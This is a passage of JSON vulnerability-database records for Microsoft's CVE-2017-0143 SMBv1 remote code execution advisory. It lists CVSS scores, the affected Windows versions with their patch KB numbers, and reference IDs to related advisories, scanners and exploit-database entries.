Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T04:47:39", "differentElements": ["msAffectedSoftware"], "edition": 68}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T06:50:12", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", 
"AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB3210721", "KB3205401", "KB4012216", "KB4013198", "KB3213986", "KB4012214", "KB4012217", "KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB3177186", "KB4012212", "KB4012215", "KB4012598", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": 
"Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], 
"vendorCvss": {}}, "lastseen": "2021-09-20T06:50:12", "differentElements": ["msAffectedSoftware"], "edition": 69}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "e82055c0f190318442e2f0bde68f2113", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", 
"references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T08:45:23", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", 
"kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for 
x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", 
"kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
